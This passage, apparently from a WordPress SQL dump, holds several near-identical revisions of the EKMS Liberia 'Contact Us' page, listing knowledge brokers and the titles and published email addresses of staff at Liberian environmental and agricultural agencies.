data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:45:39','2019-11-28 01:45:39','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2896,1,'2019-11-28 01:47:08','2019-11-28 01:47:08','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><p><strong>Konikay Nimely</strong></p><p>EIA Manager, FDA</p><p><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:47:08','2019-11-28 01:47:08','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2897,1,'2019-11-28 01:50:34','2019-11-28 01:50:34','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:50:34','2019-11-28 01:50:34','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2898,1,'2019-11-28 01:54:58','2019-11-28 01:54:58','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n		<p>MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p>MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p>GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:54:58','2019-11-28 01:54:58','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2899,1,'2019-11-28 01:59:13','2019-11-28 01:59:13','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n		<p>MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p>MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p>GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p>Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p>Assistant Manager - Compliance and Enforcement, ESIA, EPA\nkawumtoure@gmail.com<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:59:13','2019-11-28 01:59:13','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2900,1,'2019-11-28 01:59:58','2019-11-28 01:59:58','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n		<p>MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p>MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p>GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p>Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p>Assistant Manager - Compliance and Enforcement, ESIA, EPA\nkawumtoure@gmail.com<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:59:58','2019-11-28 01:59:58','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2901,1,'2019-11-28 02:00:54','2019-11-28 02:00:54','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n		<p>MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p>MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p>GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a 